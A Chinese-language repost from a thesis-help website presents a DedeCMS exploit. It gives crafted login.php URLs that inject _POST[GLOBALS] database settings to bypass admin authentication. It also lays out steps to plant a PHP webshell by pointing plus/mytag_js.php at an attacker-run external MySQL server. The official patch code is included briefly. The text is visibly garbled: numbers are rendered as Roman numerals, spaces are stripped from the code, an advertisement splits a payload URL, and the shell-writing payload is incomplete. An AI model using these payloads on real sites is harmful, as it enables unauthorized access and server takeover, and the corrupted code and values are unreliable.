"景先生毕设|www.jxszl.com

DEDECMS 爆严重安全漏洞 免账号密码直接进入后台

2022-10-28 23:35编辑: www.jxszl.com景先生毕设
入侵步骤如下:http://www.xx.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=I.I.VI.IIVV.I.VIIIIII.IX0&_POS

 更多精彩就在: 51免费论文网|www.jxszl.com 
T[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
把上面validate后面的字母改为当前的验证码,即可直接进入网站后台.
小编分析了I.下,此漏洞的前提是必须得到后台路径才能实现,因此大家I.定要养成使用DEDECM建站时改后台名字的习惯.下面给出官方的解决办法:
解决办法:
找到include/common.inc.php文件,把
foreach($_REQUESTas$_k=>$_v)
{
var_dump($_k);
if(strlen($_k)>0&&preg_match(#^(cfg_|GLOBALS)#,$_k)):
{
exit(Requestvarnotallow!);
}
}
换成
//检查和注册外部提交的变量
functionCheckRequest(&$val){
if(is_array($val)){
foreach($valas$_k=>$_v){
CheckRequest($_k);
CheckRequest($val[$_k]);
}
}else
{
if(strlen($val)>0&&preg_match(#^(cfg_|GLOBALS)#,$val))
{
exit(Requestvarnotallow!);
}
}
}
CheckRequest($_REQUEST);
网传的都是说要知道后台才能利用,但不用,只要plus目录存在,服务器能外连,就能拿shell
前题条件,必须准备好自己的dede数据库,然后插入数据:
insertintodede_mytag(aid,normbody)values(I.,{dede:php}$fp=@fopen("I..php",a);@fwrite($fp,\);echo"OK";@fclose($fp);{/dede:php});
再用下面表单提交,shell就在同目录下I..php.原理自己研究...


















====================================================
DedeCmsvV.VI-V.VII0day
其实除过windows系统,很多服务提供商是不让php连接外部mysql服务器的.
用PHPNow在本地搭建DEDECMS运行环境并安装DEDECMS,这里以DedeCMSVVVII_UTFVIII为例.
直接进后台:
dede/login.php?dopost=login&validate=VIIIIIIIIV&userid=admin&pwd=admin&_POST[GLOBALS][cfg_dbhost]=I.IXII.I.VIVIII.I..I.&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=I.IIIIIIVVVI&_POST[GLOBALS][cfg_dbname]=dedecmsvVVIIutfVIII&_POST[GLOBALS][cfg_dbprefix]=dede_
直接获得webshell:
进入自己在本地搭建的dede数据库,然后插入数据:
insertintodede_mytag(aid,normbody)values(I.,{dede:php}$fp=@fopen("I..php",a);@fwrite($fp,);echo"OK";@fclose($fp);{/dede:php});
在地址栏提交以下语句即可获得I.句话木马plus/I..php:
plus/mytag_js.php?aid=I.&_POST[GLOBALS][cfg_dbhost]=I.IXII.I.VIVIII.I..I.&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=I.IIIIIIVVVI&_POST[GLOBALS][cfg_dbname]=dedecmsvVVIIutfVIII&_POST[GLOBALS][cfg_dbprefix]=dede_&nocache=true

原文链接:http://www.jxszl.com/biancheng/dedecms/72388.html